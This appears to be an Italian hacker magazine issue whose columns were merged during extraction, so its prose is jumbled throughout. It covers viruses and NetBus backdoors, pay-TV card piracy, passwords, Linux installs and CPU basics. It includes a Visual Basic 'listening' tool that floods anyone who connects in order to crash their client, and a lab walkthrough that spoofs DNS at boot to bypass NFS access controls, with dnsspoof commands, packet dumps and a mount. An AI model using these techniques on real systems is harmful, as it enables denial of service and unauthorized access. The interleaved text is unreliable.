Laboratories svilupparono “Core rimbalzava producendo danni. Ping Pong grammi Microsoft, primo tra tutti Outlook
Wars”, un gioco in cui ognuno dei pro- proveniva dal Politecnico di Torino, nello e la sua versione gratuita Outlook Express,
grammatori scriveva dei programmi in stesso istituto universitario fu sviluppata hanno cominciato a diffondersi virus spe-
grado di riprodursi, nascondendoli nel l’utilità Devirus che individuava il codice cifici per la posta elettronica, che utilizzano
computer. Ad un segnale convenuto, ogni Ping Pong e lo eliminava. questi programmi come veicolo di conta-
virus cercava di riprodursi e distruggere gli Nel 1986 viene alla luce Brain, un vi- gio. Sono quindi nati virus con una veloci-
altri virus. Alla fine vinceva colui che pote- rus che infettava il settore di boot del tà e una vastità di diffusione mai vista pri-
floppy disk. Brain fu sviluppato in Pakistan ma: Melissa, I Love You e molti altri.
da due fratelli, Basit e Amjad. Brain non
aveva un codice dannoso, ma si limitava a >> Trojan e Backdoor
riprodursi su tutti i dischetti inseriti nel let-
tore di un PC infetto modificandone l’eti- La tipologia di virus che più minaccia la
chetta con il testo “(c) Brain”. nostra privacy è quella dei cavalli di Troia,
Nel 1990 la complessità dei virus fe- o meglio una loro sotto-tipologia chiama-
ce un passo in avanti. Furono creati, ta Backdoor Trojan. Sono costituti da
infatti, virus definiti polimorfi. Un hacker un’applicazione di tipo client e da un ser-
noto come Dark Avenger, distribuì il Muta- ver (che risiede sul computer infetto).
NetBus permette di prendere il totale
tion Engine; un programma che consenti- La parte server può essere inserita all’in-
controllo della macchina su cui viene va a tutti di creare virus polimorfi. L’arri- terno di un qualsiasi file eseguibile e rap-
installata, quasi sempre a tradimento, la vo di Windows 95 segnò un punto di presenta il file che sarà diffuso mediante
versione server del programma.
16| www.hackerjournal.it
>>
della Distruzione
dell’hacking, con una descrizione delle tipologie principali di virus.
e-mail o attraverso un qualunque softwa- nosciuta. Controllare tsempre utti i file che Un metodo per difendersi da programmi di
re Una volta attivata l’applicazione server, s’immettono nel sistema, anche perché la BackDoor Trojan è di istallare un buon
chi ha il client e le chiavi di accesso diffusione dei virus avviene mag- programma di rilevazione e aggior-
può prendere il controllo completo giormente con lo scambio di file tra narlo frequentemente. Questo pro-
della macchina server, ed efefttuare amici o per email. La posta elettronica è gramma dovrebbe essere affiancato da un
operazioni di trasferimento file, uno dei principali mezzi di diffusione di vi- FireWall, che controlla rigorosamen-
controllo della rete, ricerca di pas- rus: basta aprire il file infetto allegato a un te tutti i programmi che tentano di
sword, apertura del lettore CD e de- messaggio per essere contagiati. È oppor- accedere ad Internet e segnala chi cer-
cine di altre operazioni. tuno controllare sempre i file allegati con ca di entrare nel nostro computer. Ovvia-
un programma antivirus. In particolare oc- mente, il sistema più sicuro di tutti è quello
Euristica: una tecnologia antivirus corre controllare i file che presentano le di lasciare stare il Computer ed usare la
www.hackerjournal.it |17
TV SAT
L
La lunga battaglia fra Telepiù cale che li porta a stare da-
Digitale e gli Hackers sem- vanti al PC anche per 12
brerebbe conclusa. Nei corri- ore di fila, benché agisca-
doi milanesi i tecnici dell’e- no illegalmente cercando
mittente televisiva sono fieri di decifrare le trasmis-
del lavoro svolto e sono con- sioni accessibili a pa-
vinti di aver segnato un punto fonda- gamento; i commer-
mentale contro la pirateria grazie al- cianti invece sfruttano
l’installazione del Seca MediaGuard le conoscenze e il sudo-
2.0: “Con la chiusura del vecchio siste- re degli “studiosi” per
ma e l’introduzione del nuovo sistema creare un traffico illecito
Mediaguard portiamo a compi- di card non autorizzate alla
mento la più importante visione dei programmi. Gli
operazione anti- unici ad avere un vero vantaggio
pirateria dalla pirateria sono proprio i commer- mente alle foto della
m a i cianti disonesti, e non tanto gli utenti nuova card ce ne sono
fatta in che sborsano grosse somme di denaro altre che testimonie-
Italia”, per una card taroccata che molto spes- rebbero l’avvenuto
ha di- so smette di funzionare dopo un po’ di Crack del nuovo
chiarato tempo. sistema.
Olivier Ge- Ovviamente il fenomeno di maggiore Noi non
rolami, Am- espansione delle notizie sul sistema di ci crediamo, però pensiamo che questa
ministratore codifica firmato Tele+ è Internet: new- volta qualche verità ci sia: un sito in-
Delegato di sgroup, interi siti internet, chat, forum e glese che offriva tutte le notizie ineren-
Tele+, “com- mailing list pullulano di iscritti. ti alla nuova scoperta è stato chiuso nel
piendo un salto Sono apparse le “normali” voci di cor- giro di 12 ore con una tempestività de-
tecnologico nella ridoio qualche giorno dopo “Scoperto gna di nota. Perché gli altri siti che ri-
difesa dell’esclu- Crack per il Seca 2.0”, voci che tuttora portano le “bufale” Seca 2 sono tuttora
sività dei nostri però risultano non confermate. Dall’al- online?
programmi che pre- tra parte, gruppi di persone costituisco- Questo è il motivo che ci porta a fare
sto convincerà anche no delle Community “morali” che criti- qualche riflessione non del tutto “posi-
i più scettici. Il nuovo cano gli elevati prezzi della PayTv mila- tiva”, anche se è possibile che si tratti
sistema non solo è nese e perciò ritengono impossibile della solità “bufala internettiana”. So-
estremamente complesso, ma è dotato l’arresto della Pirateria. Dopo il primo lamente il tempo ci svelerà la verità.
anche di efficaci misure di autodifesa Boom di notizie si è passati a un perio-
capaci di bloccare i tentativi di intrusio- do di relativa tranquillità nel quale le
ne. D’ora in avanti si potrà avere ac-
cesso ai programmi trasmessi da Tele-
più Digitale solo abbonandosi regolar-
mente.” …
“acque” sembravano essersi calmate.
A fine luglio però è giunta in Italia una
nuova sigla: “D2”.
? CAM (Conditional Access Modu-
le): I circuiti che si occupano di de-
codificare il segnale cifrato.
18| www.hackerjournal.it
>>
sta in merito, comunque in questa era zando un ricevitore common interface. quindi PPV e Televisione Interattiva (ITV),
del III millennio in cui i cellulari, com- Mentre prima il comando del rispondi- e purtroppo nessun aggiornamento
puter, videocamere digitali ed ogni tore, di fatto, attivava la visione, ades- della CAM potrà colmare questa gran-
strumento all’avanguardia sono ormai so abilita la carta ad aprire la visione de lacuna sopra espo-
accessibili a tutti o quasi, la televisione solo su richiesta del cliente. Tale ri- sta. Tutto questo per-
(Mass-Media più evoluto e potente in chiesta avviene pre- ché secondo Telepiù
assoluto poiché in grado di raggiunge- mendo il tasto OK Digitale veniva me-
re la più grossa fetta di utenza) deve ed una volta che appare no il concetto di PPV,
in futuro dovrà essere presente nelle il banner di acqui- visto che non erano
sto”. Benché dispon- loro a decidere
>> Ma perche non vedo la gano del tasto OK, i quando vedere l’e-
Common Interface non vento e poi perché
PPV Palco? possiedono il sistema l’ordine doveva es-
interattivo Media High- sere fatto poco prima della visione.
molteplici forme in tutte le case degli way e di conseguenza Mossa azzeccata? Indubbiamente ades-
italiani. purtroppo non sono in grado di inter- so la PayTv milanese ha un maggiore
Crediamo che chi veramente sia dispo- pretare in modo corretto il comando di controllo degli apparecchi collegati al
sto a spendere anche 500 Euro da un Seca2 e questo porterà sicuramente dei
commerciante disonesto per comprarsi
una carta “taroccata”, possa sottoscri-
vere un abbonamento di circa 40 Euro
al mese. Questo abbonamento tuttavia
non permette di vedere nemmeno il
? DVB (Digital Video Broadcasting):
Lo standard per le trasmissioni di-
gitali. Non utilizzato negli USA.
vantaggi alla stabilità della rete. Forse
però gli abbonati che disponevano del
decoder Common Interface si sono sen-
titi traditi da questa drastica scelta e non
se la sentono di acquistare un nuovo de-
50% dei programmi offerti la Telepiù inizio visione. Tali decoder, che non coder firmato “Gold Box”.K
Digitale, se si escludono gli spettacoli hanno mai permesso la visione di Pri-
Pay Per View. Forse, quindi, il fuoco mafila Stream, potranno funzionare so- Francesco Musella
lamente per i canali in pay tv, esclusa www.mondosat.net
www.hackerjournal.it |19
sicurezza
Apriti Sesamo!
“Io per comodità utilizzo la
stessa password per tutti i
sistemi che ne chiedono una”
“Anche io - Uso la tua”
20 | www.hackerjournal.it
>>
Dieci regole per stare
rete, come per esempio Win Pass, che lo fa screen saver, o quella di un file di Word),
automaticamente. Ricordo che tutti i pro- il malintenzionato di turno potreb- tranquilli
grammi che sto citando sono facilmente be avere accesso a tutti quanti i ser-
reperibili in rete facendo una semplice ri- vizi utilizzati. Se tutti questi attacchi fal-
cerca ad esempio su Google, e quindi so-
no alla portata di tutti! Qualunque malin-
tenzionato sarebbe capace di trovarli per
lissero, al malintenzionato non resta che
provare un attacco brute force (forza bru-
ta). Usando un programma come Brutus,
1 Non utilizzate mai il vostro nome, quello del
cane o del gatto, quello dei propri gruppi o
cantanti preferiti o quello della vostra ragazza
danneggiarci. potrebbe effettuare migliaia e migliaia di (o del ragazzo).
Se invece il malintenzionato non avesse tentativi fino a trovare la password giusta.
www.hackerjournal.it |21
LINUX
# cd ~/tmp
# cat pacchetto.tar.bz2
bunzip | tar xvf -
|
www.hackerjournal.it |22
>>
script “./configure”, per cui si è dalle directory predisposte per
Come aggiornare un
costretti a modificare a mano il contenerle. per renderle disponi- programma
makefile, oppure quando il make- bili ci sono 2 modi:
file non prevede il comando Molto spesso, invece di installare
“make install”, e bisogna quindi * modificare la configurazio- completamente la nuova versione
installare il programma mettendo ne di “/etc/ld.so.cache”; di un programma, è possibile
a mano i file giusti al posto giusto. * utilizzare la variabile di aggiornare la vecchia versione con
ambiente “LD_LIBRARY_PATH” una patch. Se la versione da
aggiornare si trova nella cartella
>> Installare Pacchetti Per agire secondo la prima possi- “~/tmp” dobbiamo posizionarci in
gia compilati bilità bisogna comprendere come quella stessa cartella e fare:
funziona questo sistema. Il file
“/etc/ld.so.cache” viene creato a # patch < file_da_aggiornare
Adesso passiamo all’installazione partire da “/etc/ld.so.conf”, che
di programmi già compilati. contiene directory destinate a con- L’aggiornamento potrebbe fallire.
Innanzitutto dobbiamo prendere tenere delle librerie. Il program- Se vogliamo vedere gli errori com-
del software adatto per la nostra ma “ldconfig” serve a ricreare messi basta digitare:
piattaforma. Il sorgente di uno “/etc/ld.so.cache” in modo da
stesso programma può infatti mantenerlo aggiornato. # patch < file_da_aggiornare
dare origine a differenti pacchetti Occorre quindi aggiungere le 2> file_degli_errori
compilati a seconda del sistema directory che ci servono al file
operativo utilizzato e della piatta- “/etc/ld.so.conf” e poi riavviare Se gli aggiornamenti sono più di
forma hardware (normalmente “ldconfig” uno dobbiamo applicarli in
per i Personal Computer si usa la sequenza.
dicitura i386). Un programma in Per usare invece la variabile di
formato binario deve essere sistema “LD_LIBRARY_PATH” pos-
estratto dall’archivio che lo contie- siamo intervenire attraverso sem- LD_LIBRARY_PATH=”/opt/mio_pro
ne; fortunatamente, a volte c’è plici script, con ciò possiamo fare gramma/lib:$LD_LIBRARY_PATH”
uno script che ha proprio questa un modo che un solo programma export LD_LIBRARY_PATH
funzione. Altre volte invece biso- veda certe librerie.
gna farlo manualmente. Se vogliamo usare questa variabi- Avvia il programma:
Quando si può scegliere la desti- le ricordiamoci di includere anche # mio_programma
nazione è bene mettere tutto in i percorsi standard: Avviando lo script viene modifica-
una cartella, preferibilmente ta la variabile
discendente da “/opt/” e in certi “/lib/”, “/usr/lib/”, “LD_LIBRARY_PATH” per quel pro-
casi bisogna definire alcune “/usr/local/lib”. Ecco un esem- cesso e quindi alla fine del proces-
variabili d’ambiente affinché il pio dell’aggiunta di questa so termina lo script e tutte le sue
programma possa funzionare. variabile a “/etc/profile”: modifiche.
Uno dei casi più comuni è la PATH
che dovrebbe contenere il percor- LD_LIBRARY_PATH=/lib:/usr/li
so necessario ad avviare il pro- b:/usr/local/lib:/opt/mio_pr Vediamo ora la sintassi del
gramma. Quasi sempre i file di og/lib:/opt/altr comando “ldd”.
documentazione che accompa- o_prog/lib
gnano i programmi elencano tutte export LD_LIBRARY_PATH # ldd /bin/bash
le variabili necessarie al funzio- ; risultato: lbncurses.so.4
namento. Se un programma richiede libre- => /usr/lib/nbcurses.so.4
Queste variabili possono essere rie che possono entrare in conflit- (0x40000000)
collocate in alcuni file di configu- to con altri programmi è bene ; e di seguito le altre
razione della shell utilizzata configurare questa variabile solo librerie richieste.
(come /etc/profile/ oppure per un certo programma, vediamo
~/.bash_profile), e variano a come fare: Il risultato in pratica mostra le
seconda di come è configurato il dipendenze dalle librerie di
sistema. # /bin/sh “/bin/bash”, indica il nome delle
Alcuni programmi usano librerie librerie e il loro posto nel sistema,
non standard, dette dinamiche, Modifica il percorso di ricerca risolvendo anche collegamenti
che spesso vengono collocate fuori delle librerie: inutili. K
www.hackerjournal.it |23
Sicurezza
N
Basta aprire un firewall per 2 CommandButton e il winsock. Per ren- cale la porta che viene scritta nella txtport
notare che un qualsiasi PC dere il tutto meno complicato e quindi “txtport.txt <— testo della txtport”, gli or-
collegato a Internet riceve de- l’algoritmo più comprensibile, eviteremo diniamo di mettersi in ascolto su quella
cine di tentativi di connessione di inserire istruzioni di debugging come porta e infine di visualizzare una finestra
e ispezioni che mirano a indi- GestError e moduli di gestione di control- msgbox “messaggio” con scritto:
viduare una porta aperta. li grafici (Enabled e compagnia). “Servizio in ascolto sulla porta: “ &
Questo articolo illustrerà come realizzare I componenti del programma sono:
e applicare un servizio che, messo in txtport.Text,”
ascolto, potrà darvi la possibilità di OGGETTO NOME
loggare di chi cerca di connettersi - Textbox txtport dove appunto
alla vostra macchina, avendo in ol- - Command1 cmdascolta
tre la possibilità di bloccare il client - Command2 cmddisconnetti “& txtport.Text”
che l’amico fritz sta utilizzando, ma solo - List1 lstlog
nel caso in cui avvenga una richiesta di - Winsock ws indica l’immissione nel messaggio del nu-
connessione con invio di flag TCP “SYN”. mero digitatao nella txtport.
Nella pratica, qualora rilevasse una richie- Potete vedere l’intero codice del program- “Vbinformation” indica il tipo di msgbox,
sta di connessione su una deterimanta ma nel riquadro in questa pagina. Passia- nel nostro caso informazione\notifica
porta selezionata da noi, il servizio invierà mo quindi ad analizzare quello che abbia-
un flood testuale paralizzando momenta- mo codato, analizzando uno per uno i 2) ws_ConnectionRequest
neamente il client, che si troverà a riceve- suoi tre eventi: cmdascolta_Click (ciò che
re una grande mole di dati. Private Sub ws_ConnectionRe-
quest(ByVal requestID As Long)
>> Il programma
Questo può essere molto utile per scorag-
? Flood: una grande mole di dati
inviata a ripetizione verso un
computer o un programma,
con l’intento di paralizzarne la
If ws.State <> sckClosed Then
ws.Close
ws.Accept requestID
lstlog.AddItem “Connessione di
giare eventuali lameroni che decidessero connessione. :” & ws.RemoteHostIP & “ sulla
di tentare connessioni a porte particolar- porta :” & txtport.Text
mente senisbili e che non corrispondono a succede quando facciamo clic sul pulsan- For i = 1 To 10000
servizi effettivamente attivi. Per esempio, te cmdascolta), ws_ConnectionRequest ws.SendData “Togliti dai piedi
chi installa un Web server locale, non ha (ciò che succede quando riceviamo una ri- lamerone, sei stato loggato —-
alcun bisogno dei servizi ftp (porta 21) o chiesta di connessione dall’esterno) e > “ & ws.RemoteHostIP & vbCrLf
telnet (porta 23), e può quindi “protegger- cmddisconnetti_Click (ciò che succede Next i
li” con questo programmino. quando facciamo clic sul pulsante cmddi- End Sub
Per realizzare questo programma serve sconnetti).
l’ambiente di sviluppo Visual Basic, in Ora analizziamo invece quanto avviene
versione 5 o 6. Create un nuovo pro- 1) cmdascolta_Click nel caso in cui il nostro servizio riceva
gramma exe standard con un form nel una richiesta di connessione “ricezione
quale inserirete una TextBox, una ListBox, Private Sub cmdascolta_Click() flag TCP SYN”. Come prima cosa accetta
ws.LocalPort = txtport.Text la connessione, in seguito aggiunge una
ws.Listen riga al log “lstlog” inserendo un messag-
MsgBox “Servizio in ascolto gio del tipo
sulla porta: “ & txtport.Text,
vbInformation “Connessione di : *ip del la-
End Sub mah”
sulla porta : *scritta nella
Come dicevamo, questo è quanto accade txtport*”
La finestra del programma Listening,
quando si fa clic sul CommandButton
posto in ascolto sulla porta 23. I due
“cmdascolta”. Come prima cosa istruiamo Dato che ws.remoteHostIp indica l’ip dell’-
pulsanti attivano e disattivano il servizio. il nostro ws per impostare come porta lo- host remoto che cerca di connettersi, una
24| www.hackerjournal.it
>>
lasciando quindi solo la stringa da inviare.
Se invece non desideriamo far visualizzare
a chi si connette alcun messaggio, optan-
do quindi solo di loggare il suo IP, dobbia-
mo eliminare anche
3) cmddisconnetti_Click
Private Sub
cmddisconnetti_Click()
ws.Close
MsgBox “Sessione terminata”,
vbInformation
End Sub
endsub
me minimo l’indirizzo IP da cui
proviene la chiamata, la data e connettersi. Il numero di ripetizioni può IL CODICE DEL PROGRAMMA
l’ora della connessione. essere modificato a piacimento. Impo- LISTENING
stando un numero molto altro di ri-
volta accettata la connessione e loggato petizioni (come 500000...) si potrà ws.LocalPort = txtport.Text
l’indirizzo del lamer si attiva il cliclo di for impallare il client che “l’utente” sta ws.Listen
“impostabile”, ossia: usando per connettersi, costringendo- MsgBox “Servizio in ascolto sulla porta: “ &
lo quindi a killare il processo. txtport.Text, vbInformation
For i = 1 To 10000 Ciò funge anche con client che non visua- End Sub
Private Sub cmddisconnetti_Click()
ws.SendData “ Togliti dai pie- lizzano i dati ricevuti, come per esempio ws.Close
di lamerone, sei stato loggato alcuni portscanner, client ftp.. o perchè no MsgBox “Sessione terminata”,
—-> “ & ws.RemoteHostIP & WebCracker e company, i quali andranno vbInformation
vbCrLf solo in overflow bloccandosi a causa del- End Sub
Next i l’eccessivo flusso ricevuto dal server (il no- Private Sub ws_ConnectionRequest(ByVal
stro computer). Se invece non desideria- requestID As Long)
che indica un’invio di diecimila stringhe, mo esegguire l’attacco, ma solo far visua- If ws.State <> sckClosed Then ws.Close
con il comando lizzare a chi si connette il “messaggio di ws.Accept requestID
benvenuto” e loggarlo, ci basterà elimina- lstlog.AddItem “Connessione di :” &
ws.SendData “ Togliti dai pie- re ws.RemoteHostIP & “ sulla porta :” &
txtport.Text
di lamerone, sei stato loggato il clico di for nel quale è inserita la stringa For i = 1 To 10000
—-> “ & ws.RemoteHostIP & da sendare, ossia eliminare ws.SendData “Togliti dai piedi lamerone, sei
vbCrLf stato loggato —-> “ & ws.RemoteHostIP &
For i = 1 to 10000 vbCrLf
Questa stringa verà visualizzata dal la- Next i
mer che cerca di connettersi, che leggerà e anche Next i End Sub
www.hackerjournal.it |25
Programmare
-RAM; Random Access Memory; rappre- ne le informazioni e i dati necessari per bit
senta la memoria centrale, ovvero la par- l’esecuzione dei programmi. È da di-
te di memoria temporanea che la CPU stinguere dalle memorie di massa (co- 1 2 3 4 5 6 7 8
utilizza come appoggio per eseguire le me l’HD, floppy, cd...) per via delle sue
operazioni. principali caratteristiche: essa è fonda-
1 byte = 8 bit
-Periferiche I/O; Sono le periferiche di mentalmente di dimensioni molto ri-
Input e/o di Output; Esse permettono lo dotte, è di tipo “volatile” (si perde il Figura 2
scambio di informazioni tra l’elaboratore suo contenuto quando si spegne il PC Il funzionamento della RAM
26 | www.hackerjournal.it
>>
?
L e t t ura
Scrittura
sce dal registro alla cella. già mensionati( Reg.Dati e Reg. Indirizzi) è
L e t t ura
Il Bus Indirizzi trasferisce il registro indi- bene ricordare il registro istruzione corren-
01
C’è poi il Bus Controlli, che scambia in- ruzioni, i registri di lavoro e tra gli altri l’im-
formazioni tra Master e Slave. portantissimo Registro di Stato, che riporta
01
E’ la parte della macchina che interpreta molte informazioni fondamentali sulle ope-
ed esegue effettivamente le istruzioni (ov- razioni svolte dalla ALU. K
Registro Dati
vero gli algoritmi tradotti in linguaggio
Figura 3 macchina) del programma dopo aver By Biulo
Trasferimento dei dati tra estratto e decodificato le informazioni (che arkanet@hotmail.com
memoria e altri componenti son tutte trasmesse in linguaggio binario).
MEMORIA RAM E ROM
Ritornando al nostro argomento principale >> La CPU
(la memoria centrale), spieghiamo ora co- I tipi di memoria centrale non si limitano al-
me la macchina esegue le operazioni di let- la RAM, esiste infatti un altro importante ti-
tura dalla memoria e scrittura in memoria: I principali elementi della CPU sono: po di memoria, spesso ignorato perke’ non
ogni cella di memoria può essere “indiriz- -Unità di controlli: preleva, decodifica ed comunemente espandibile: parliamo della
zata” (equivale ad assegnarle un numero a esegue elaborazioni e trasferimenti; ROM (Read Only Memory). Questa zona di
seconda della sua posizione) e quindi “pun- Clock: (Orologio di sistema) sincronizza memoria in cui le operazioni sono limitate
tata”...(tranquilli, se avrete passione e tem- e coordina tutte le operazioni; alla sola lettura, contiene le informazioni
po tutto si chiarirà!). Le posizioni e gli indi- -ALU: (Unità Aritmetico-Logica) realiz- fondamentali per il funzionamento del si-
rizzi delle celle sono contenute tutte nel Re- za tutte le operazioni aritmetico logiche (ad- stema, registrate in modo permanente e
gistro Indirizzi. dizione, algebra booleana...); non volatile (definite spesso “Firmware”).
Il Registro Dati, invece, contiene i dati Come abbiamo detto in precedenza, il pro-
che devono essere immagazzinati in me-
moria, o che sono stati estratti da essa.
Cpu
Quando estraiamo un dato dalla memoria
(per esempio un’immagine),noi indichiamo 01010101
Bus
>> Il Bus
Nel momento in cui decidiamo di salvare
un documento nel nostro piccì, effettuiamo
un’operazione di scrittura in memoria. Il
computer altro non fà che copiare il Regi-
01010101
stro Dati in una cella di memoria, deposi-
tandolo (STORE). Il Bus mette in comunica- Figura 4
Funzioni dei vari Bus della macchina
www.hackerjournal.it |27
dossier
H Hostname IP Descrizione
attack.linuxbox.com 192.168.1.4 Host dell’attacker
dns.linuxbox.com 192.168.1.5 Server DNS
attack.linuxbox.it 192.168.1.6 Client “fidato”
victim.linuxbox.com 192.168.1.7 Server NFS
N
e llo scorso numero abbiamo visto come è possibile in- /etc/exports:
serirsi in una richiesta di connessione Internet utiliz- /home/ftp trust.linuxbox.com(ro)
zando un baco del software Bind, che sovraintende il
servizio Dns. Questa volta vediamo come questa falla Il file /etc/exports così dichiarato permette (dovrebbe permette-
può essere sfruttata per attaccare un Network File re) l’accesso in sola lettura (ro) alla home directory dell’utente ftp
System (NFS). Se vi siete persi l’articolo precedente, al solo sistema che risponde all’hostname trust.linuxbox.com.
andatevi a recuperare l’arretrato in formato Pdf, su www.hac-
kerjounal.it; ne vale la pena. Vediamo cosa accade durante il boot del sistema nel momento
I servizi NFS sono stati sviluppati allo scopo di permettere il in cui lo script rc.nfsd (Slackware8.0) inizializza i servizi NFS:
mount di partizioni di disco remote, se mal configurato questo
servizio può essere tratto in inganno da un utente remoto non Starting NFS services:
autorizzato che voglia accedere alle partizioni condivise. NFS si /usr/sbin/exportfs -r
serve del file /etc/exports per determinare la legittimità o meno /usr/sbin/rpc.rquotad
delle richieste di mount remote, in tale file sono pertanto indi- /usr/sbin/rpc.nfsd 8
cate le risorse che si desidera condividere e le macchine auto- /usr/sbin/rpc.mountd —no-nfs-version 3
rizzate ad accedere a tali condivisioni. /usr/sbin/rpc.lockd
Al momento dell’avvio dei servizi NFS il file /etc/exports viene /usr/sbin/rpc.statd
processato dal comando exportfs -r che viene di norma avviato
automaticamente dallo script di inizializzazione dei servizi. Nel Nel preciso istante in cui lo script rc.nfsd avvia exportfs -r il fi-
qual caso tale file contenesse riferimenti ad hostname il sistema le /etc/exports viene processato e il nome host trust.linux-
box.com viene risolto nel relativo indirizzo IP tramite DNS
query, in tal modo in presenza di una richiesta di mount futu-
>> NFS server bypass ra il server NFS non avrà più l’esigenza di interrogare il na-
meserver ma si avvarrà dell’IP memorizzato a tempo di boot
sarà costretto alla risoluzione degli stessi mediante query DNS per soddisfare qualsiasi richiesta. Pertanto il solo momento in
che potrebbero rendere il sistema soggetto ad accessi non au- cui i servizi NFS risultano vulnerabili allo spoofing del DNS è
torizzati. rappresentato dal momento in cui esso aggiorna la tabella
Come avrete avuto modo di capire, la pratica comune di inse- delle condivisioni, di norma tale operazione viene svolta du-
rire hostname all’interno di liste per il controllo degli accessi rante il boot o su richiesta dell’amministratore.
28 | www.hackerjournal.it
>>
L’output di Snort ci offre la possibilità di loggare i pacchetti che l’IP 192.168.1.6 (trust) risolto a boot time. E’ importante notare
transitano durante questa operazione, ovvero quali query ven- che nel momento della richiesta di mount da parte di un client
gono inoltrate da victim verso il DNS e quali risposte riceve da remoto il server NFS non ha la necessità di consultare il DNS in
quest’ultimo: quanto la risoluzione dell’hostname è avvenuta a tempo di boot.
Ne consegue che se un malintenzionato volesse eludere i con-
attacker@attack:~# snort -vd udp port 53 trolli di sicurezza di NFS dovrebbe agire durante il processo di
02/20-13:18:28.241483 192.168.1.7:1072 -> 192.168.1.5:53 avvio del server, qui di seguito mi limito ad illustrare in pochi e
UDP TTL:120 TOS:0x0 ID:35227 IpLen:20 DgmLen:64 DF semplici passi come potrebbe procedere al fine di perseguire il
Len: 44 suo scopo:
4F 5D 01 00 00 01 00 00 00 00 00 00 05 74 72 75 O]...........tru
73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.linuxbox.com. attacker@attack:~# dnsspoof -f ~/hosts.txt
00 01 00 01 ... dnsspoof: listening on eth0 [udp dst port 53 and not src
192.168.1.4]
Victim invia una query intesa a risolvere l’hostname trust.linux-
box.com che si trova nel file /etc/exports, questa operazione vie- L’attacker mette in ascolto Dnsspoof sul proprio sistema in atte-
ne eseguita a tempo di boot o su richiesta dell’admin... sa di intercettare le DNS query causate dall’inizializzazione dei
servizi NFS sulla macchina della vittima, nell’intento di restituire
02/20-13:18:28.242207 192.168.1.5:53 -> 192.168.1.7:1072 a victim delle reply a tali interrogazioni che riportino come IP del
UDP TTL:64 TOS:0x0 ID:395 IpLen:20 DgmLen:114 sistema trust l’IP stesso dell’host da cui l’attacker sta operando,
Len: 94 ovvero 192.168.1.4. Le reply fasulle forgiate da Dnsspoof do-
4F 5D 85 80 00 01 00 01 00 01 00 01 05 74 72 75 O]...........tru vranno giungere a victim prima che tale sistema sia raggiunto
73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.linuxbox.com. dalle reply lecite inviategli dal DNS. Qui di seguito vediamo i
00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04 ............Q... messaggi che il server victim invia verso l’output standard a te-
C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06 ............Q... stimonianza del fatto che sta procedendo all’ inizializzazione di
03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80 .dns...@......Q. tali servizi:
00 04 C0 A8 01 05 ......
Starting NFS services:
Il server DNS restituisce a victim la risposta contenente l’IP dell’- /usr/sbin/exportfs -r
host trust.linuxbox.com ovvero 192.168.1.6, in fututo quando il /usr/sbin/rpc.rquotad
server NFS riceverà una richiesta di mount remota confronterà /usr/sbin/rpc.nfsd 8
l’indirizzo IP del richiedente con quello ottenuto da questa reply /usr/sbin/rpc.mountd —no-nfs-version 3
e nel qual caso dovessero risultare uguali permetterà il pieno /usr/sbin/rpc.lockd
accesso al filesystem. /usr/sbin/rpc.statd
La stessa query si ripete moltplici volte di conseguenza l’output
restante di Snort è stato omesso in quanto ritenuto poco signifi- Segue poi l’output di Dnsspoof che ha catturato e risposto a 4
cativo. Se ora dovessimo provare a fare mount da un sistema query rivolte al nameserver (192.168.1.5) da parte di victim
diverso da trust il risultato sarebbe il seguente: (192.168.1.7):
Snort è un Network Intrusion Detector open source, disponibile per 02/20-14:29:39.686343 192.168.1.5:53 -> 192.168.1.7:1074
svariati sistemi *nix. Lo si può scaricare da www.snort.org UDP TTL:64 TOS:0x0 ID:416 IpLen:20 DgmLen:114
www.hackerjournal.it | 29
dossier
Len: 94 .9...........tru
F5 AC 85 80 00 01 00 01 00 01 00 01 05 74 72 75 73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
.............tru nuxbox.com.
73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li- 00 01 00 01 ....
nuxbox.com.
00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04
............Q... 02/20-14:49:48.214328 192.168.1.5:53 -> 192.168.1.7:1079
C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06 UDP TTL:64 TOS:0x0 ID:426 IpLen:20 DgmLen:114
............Q... Len: 94
03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80 CD 39 85 80 00 01 00 01 00 01 00 01 05 74 72 75
.dns...@......Q. .9...........tru
00 04 C0 A8 01 05 ...... 73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
nuxbox.com.
Questo secondo pacchetto è giunto a destinazione (victim) ma è 00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04
stato ignorato in quanto PRECEDUTO dalla risposta fasulla for- ............Q...
nita da Dnsspoof. Ora non ci resta che terminare l’esecuzione C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06
di Dnsspoof e accedere alle condivisioni di victim come se fossi- ............Q...
mo l’host legittimo: 03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80
.dns...@......Q.
attacker@attack:~# mount 192.168.1.7:/home/ftp /mnt/nfs 00 04 C0 A8 01 05 ......
attacker@attack:~#
A questo punto nel momento stesso in cui facciamo il primo ten-
Ora abbiamo accesso in sola lettura (ro) al ramo del filesystem tativo di mount da un host non autorizzato notiamo una cosa
remoto, e possiamo incominciare a riflettere sui reali problemi molto strana, ossia...
in cui possiamo incorrere a causa di un’amministrazione super-
ficiale di tali risorse. attacker@attack:~# snort -vd udp port 53
02/20-14:52:05.417517 192.168.1.7:1079 -> 192.168.1.5:53
UDP TTL:197 TOS:0x0 ID:25875 IpLen:20 DgmLen:64 DF
>> l comando Exports Len: 44
28 CB 01 00 00 01 00 00 00 00 00 00 05 74 72 75
Questo comando viene utilizzato per mantenere aggiornata la (............tru
tabella delle condivisioni sul sistema server, in particolare è lo 73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
script di inizializzazione dei servizi NFS stesso a preoccuparsi nuxbox.com.
di svolgere tale mansione per mezzo della chiamata exportfs - 00 01 00 01 ....
r. Tuttavia tale comando può contribuire ad aprire un varco
nella sicurezza del sistema qualora venga richiamato in un 02/20-14:52:05.418237 192.168.1.5:53 -> 192.168.1.7:1079
